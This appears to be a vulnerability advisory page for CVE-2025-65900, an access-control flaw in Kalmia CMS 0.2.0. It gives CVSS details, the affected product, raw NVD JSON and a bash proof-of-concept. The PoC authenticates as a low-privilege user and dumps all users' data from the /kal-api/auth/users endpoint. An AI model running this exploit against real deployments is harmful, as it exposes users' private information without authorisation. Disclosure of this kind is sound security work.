Security Vulnerability Report
CVE-2025-65900 CVSS 6.5 MEDIUM

Published: 2025-12-04 22:15:49
Last Modified: 2025-12-10 21:38:41

Description

Kalmia CMS version 0.2.0 contains an Incorrect Access Control vulnerability in the /kal-api/auth/users API endpoint. Due to insufficient permission validation and excessive data exposure in the backend, an authenticated user with basic read permissions can retrieve sensitive information for all platform users.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:difuse:kalmia:0.2.0:*:*:*:*:node.js:*:* - VULNERABLE
Kalmia CMS < 0.2.0
Kalmia CMS = 0.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2025-65900 PoC - Kalmia CMS Unauthorized User Data Access
# Target: Kalmia CMS v0.2.0
# Endpoint: /kal-api/auth/users

TARGET_URL="http://target-server.com"
USERNAME="regular_user"
PASSWORD="user_password"

# Step 1: Authenticate and obtain session/token
echo "[*] Authenticating as regular user..."
AUTH_RESPONSE=$(curl -s -X POST "${TARGET_URL}/kal-api/auth/login" \
  -H "Content-Type: application/json" \
  -d "{\"username\":\"${USERNAME}\",\"password\":\"${PASSWORD}\"}")

# Extract token (adjust based on actual response format)
TOKEN=$(echo "$AUTH_RESPONSE" | grep -oP '"token":"\K[^"]+')

if [ -z "$TOKEN" ]; then
  echo "[!] Authentication failed"
  exit 1
fi
echo "[+] Authentication successful"

# Step 2: Exploit the vulnerability - access all users' data
echo "[*] Exploiting CVE-2025-65900..."
USER_DATA=$(curl -s -X GET "${TARGET_URL}/kal-api/auth/users" \
  -H "Authorization: Bearer ${TOKEN}" \
  -H "Content-Type: application/json")

echo "[+] Retrieved sensitive user data:"
echo "$USER_DATA" | jq .
echo "[*] PoC completed - unauthorized access to all user information achieved"

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65900", "sourceIdentifier": "[email protected]", "published": "2025-12-04T22:15:49.127", "lastModified": "2025-12-10T21:38:40.783", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kalmia CMS version 0.2.0 contains an Incorrect Access Control vulnerability in the /kal-api/auth/users API endpoint. Due to insufficient permission validation and excessive data exposure in the backend, an authenticated user with basic read permissions can retrieve sensitive information for all platform users."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:difuse:kalmia:0.2.0:*:*:*:*:node.js:*:*", "matchCriteriaId": "C633D4D2-F80B-4C2D-BFAF-757F8974D461"}]}]}], "references": [{"url": "https://github.com/DifuseHQ/Kalmia", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Noxurge/CVE-2025-65900/blob/main/README.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}